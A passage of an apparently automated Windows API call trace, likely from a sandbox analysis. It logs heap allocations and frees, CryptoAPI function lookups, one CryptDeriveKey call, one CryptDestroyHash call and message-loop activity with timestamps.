CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50cb0 [0137.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50cb0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0137.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0137.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0137.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0137.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0137.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0137.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0137.653] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87290, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87610) returned 1 [0137.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0137.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0137.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0137.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0137.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0137.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0137.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0137.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0137.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0137.654] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0137.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0137.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0137.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0137.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0137.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0137.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0137.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0137.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0137.655] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0137.655] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0137.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0137.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0137.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0137.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0137.655] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0137.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0137.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0137.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0137.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0137.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0137.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0137.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0137.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0137.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0137.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0137.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0137.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0137.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0137.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0137.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0137.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0137.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0137.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0137.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0137.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0137.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0137.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0137.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0137.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a70 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bf0 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a40 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c08 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0137.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0137.657] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0137.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0137.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0137.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a10 [0137.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0137.658] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 1 [0137.658] TranslateMessage (lpMsg=0x8cef40) returned 0 [0137.658] DispatchMessageW (lpMsg=0x8cef40) returned 0x0 [0137.658] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0137.658] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0137.659] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0137.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0137.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0137.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0137.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0137.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0137.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0137.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0137.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0137.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0137.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0137.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0137.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0137.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0137.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0137.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0137.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0137.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0137.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0137.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0137.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0137.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0137.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0137.660] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0137.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0137.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0137.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0137.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0137.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0137.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0137.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0137.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0137.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0137.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0137.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0137.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0137.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0137.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0137.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0137.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0137.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0137.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69bc8 [0137.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69bc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0137.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0137.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0137.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0137.661] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0137.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0137.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0137.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0137.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0137.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0137.662] CryptDestroyHash (hHash=0xa87290) returned 1 [0137.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0137.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0137.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0137.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0137.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0137.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0137.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0137.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0137.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0137.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0137.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0137.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0137.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0137.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0137.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0137.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0137.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0137.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0137.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0137.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0137.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0137.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0137.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0137.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0137.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0137.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0137.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0137.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0137.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0137.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0137.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0137.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0137.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0137.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0137.664] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0137.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0137.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0137.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0137.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.664] 